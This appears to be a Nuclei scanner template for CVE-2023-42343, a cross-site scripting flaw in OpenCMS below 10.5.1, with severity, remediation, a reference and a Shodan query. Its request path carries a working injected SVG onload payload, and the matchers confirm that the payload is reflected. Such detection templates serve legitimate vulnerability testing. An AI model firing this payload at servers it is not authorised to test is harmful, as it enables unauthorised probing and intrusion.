35 lines
1.0 KiB
YAML
35 lines
1.0 KiB
YAML
id: CVE-2023-42343
|
|
|
|
info:
|
|
name: OpenCMS - Cross-Site Scripting
|
|
author: DhiyaneshDK
|
|
severity: medium
|
|
description: |
|
|
OpenCMS below 10.5.1 is vulnerable to Cross-Site Scripting vulnerability.
|
|
remediation: Fixed in 10.5.1.
|
|
reference:
|
|
- https://labs.watchtowr.com/xxe-you-can-depend-on-me-opencms/
|
|
classification:
|
|
cve-id: CVE-2023-42343
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
shodan-query: "/opencms/"
|
|
tags: cve,cve2023,xss,opencms
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/opencms/cmisatom/cmis-online/type?id=1%27"><svg%20onload=alert(document.domain)>'
|
|
headers:
|
|
Content-Type: application/cmisquery+xml
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- 'Apache Chemistry OpenCMIS'
|
|
- '<svg onload=alert(document.domain)>'
|
|
condition: and
|
|
# digest: 490a00463044022076759a64ec8dcf9d061745db5d2542a5ac1e41ecbbed76ac48d4de5e23e38a57022046d2065515fddaff3bb682600a0e4500ffb0d8b44d539031bfd8fb89ea8cd091:922c64590222798bb761d5b6d8e72950 |